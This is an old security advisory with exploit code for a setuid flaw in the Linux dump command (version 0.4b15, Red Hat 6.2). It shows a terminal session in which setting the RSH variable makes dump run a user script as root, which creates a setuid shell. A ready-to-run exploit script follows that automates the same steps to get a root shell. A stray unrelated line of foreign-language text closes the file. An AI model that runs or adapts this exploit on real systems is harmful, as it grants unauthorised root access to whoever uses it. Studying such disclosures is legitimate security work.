1. Problem: Linux dump command executes external program with suid priviledge. 2. Tested Version dump-0.4b15 3. Example [mat@localhost mat]$ export TAPE=garbage:garbage [mat@localhost mat]$ export RSH=/home/mat/execute_this [mat@localhost mat]$ cat > /home/mat/execute_this #!/bin/sh cp /bin/sh /home/mat/sh chmod 4755 /home/mat/sh [mat@localhost mat]$ chmod 755 /home/mat/execute_this [mat@localhost mat]$ /sbin/dump -0 / DUMP: Connection to garbage established. DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000 DUMP: Date of last level 0 dump: the epoch DUMP: Dumping /dev/hda2 (/) to garbage on host garbage DUMP: Label: none /dev/hda2: Permission denied while opening filesystem [mat@localhost mat]$ ls -la /home/mat/sh -rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh [mat@localhost mat]$ /home/mat/sh bash# id uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat) ================================================= | | | mat@hacksware.com | | | ================================================= ---------Cut Here---------- #!/bin/sh # Redhat 6.2 dump command executes external program # with suid priviledge. # Discovered by Mat # Written for and by a scriptkid Tasc ;P # Remember, there's no cure for BSE echo "dump-0.4b15 root exploit" echo "Discovered by Mat " echo "-------------------------------------" echo DUMP=/sbin/dump if [ ! -u $DUMP ]; then echo "$DUMP is NOT setuid on this system or does not exist at all!" echo exit 0 fi export TAPE=iamlame:iamlame export RSH=/tmp/rsh cat >/tmp/rsh <<__eof__ #!/bin/sh cp /bin/sh /tmp/sush chmod 4755 /tmp/sush } __eof__ chmod 755 /tmp/rsh /sbin/dump -0 / echo echo "Waiting for rootshell .... 5 seconds...." sleep 5 /tmp/sush id

亚洲欧美在线